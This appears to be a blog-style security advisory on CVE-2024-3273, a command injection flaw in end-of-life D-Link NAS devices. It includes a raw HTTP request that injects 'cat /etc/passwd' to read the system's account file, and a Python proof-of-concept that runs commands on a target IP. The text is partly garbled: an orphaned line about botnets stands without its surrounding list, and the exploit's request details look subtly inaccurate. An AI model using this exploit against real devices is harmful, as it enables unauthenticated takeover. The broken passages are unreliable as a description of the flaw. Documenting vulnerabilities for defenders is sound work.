CVE-2024-3273 - Critical Command Injection Vulnerability in Legacy D-Link NAS Devices (DNS-320L, 325, 327L, 340L)

_Discovered: April 2024_
_Affected Models: D-Link DNS-320L, DNS-325, DNS-327L, DNS-340L (Up to 20240403)_
_Reference: VDB-259284_
_Exploit Status: Public_

What is CVE-2024-3273?

CVE-2024-3273 is a serious security vulnerability in several legacy D-Link NAS devices, including DNS-320L, DNS-325, DNS-327L, and DNS-340L. The issue lies in the HTTP endpoint /cgi-bin/nas_sharing.cgi and allows unauthenticated, remote attackers to execute arbitrary commands on the device by misusing the vulnerable system argument. This is a classic command injection attack, which can fully compromise the device.

Note:
The affected devices are no longer supported. D-Link has confirmed these products are end-of-life and will not issue a fix.

How Does the Vulnerability Work?

The vulnerable script (nas_sharing.cgi) improperly handles the system parameter in HTTP GET requests. Inputs sent to this parameter are unsafely passed to the system shell, allowing a remote attacker to inject arbitrary commands.

Example Exploit

Suppose the NAS device is exposed at http://192.168.1.100/. An attacker can send the following GET request to gain command execution:

HTTP GET Request Example

GET /cgi-bin/nas_sharing.cgi?user=admin&system=cat+/etc/passwd HTTP/1.1
Host: 192.168.1.100

This would execute the command cat /etc/passwd (list Linux system accounts) and potentially return the output to the attacker.

Below is a simple Python proof-of-concept (PoC) to exploit the vulnerability

import requests

target_ip = "192.168.1.100"    # Change to the target's IP
cmd = "id"                     # Linux command to run

url = f"http://{target_ip}/cgi-bin/nas_sharing.cgi";
params = {
    "user": "admin",
    "system": cmd
}

response = requests.get(url, params=params)
print(response.text)

Warning:
Do this only on devices you own or have explicit permission to test.

Join the NAS to botnets (crypto mining, DDoS, etc).

All this can be done without authentication if the device is exposed to the internet or a compromised WiFi/LAN environment.

Retire and Replace:

_D-Link says:_ These products are end-of-life. No security support is coming. Safest course: replace with a supported, regularly-updated NAS.

Additional References

- Original VulDB Entry: VDB-259284
- NVD Entry: CVE-2024-3273
- DLINK End-of-Life Policy

Conclusion

CVE-2024-3273 is a critical, remotely exploitable flaw in several older D-Link NAS units. If you have a DNS-320L, DNS-325, DNS-327L, or DNS-340L, you must retire it now. No patch will be released. Leaving them online puts your files and home/SMB network at severe risk.

Stay safe: Always keep network devices up-to-date and never expose unsupported hardware to the Internet!


If you found this post helpful, consider sharing it to help others avoid the risks of legacy, unsupported devices.

Timeline

Published on: 04/04/2024 01:15:50 UTC
Last modified on: 04/15/2024 20:13:57 UTC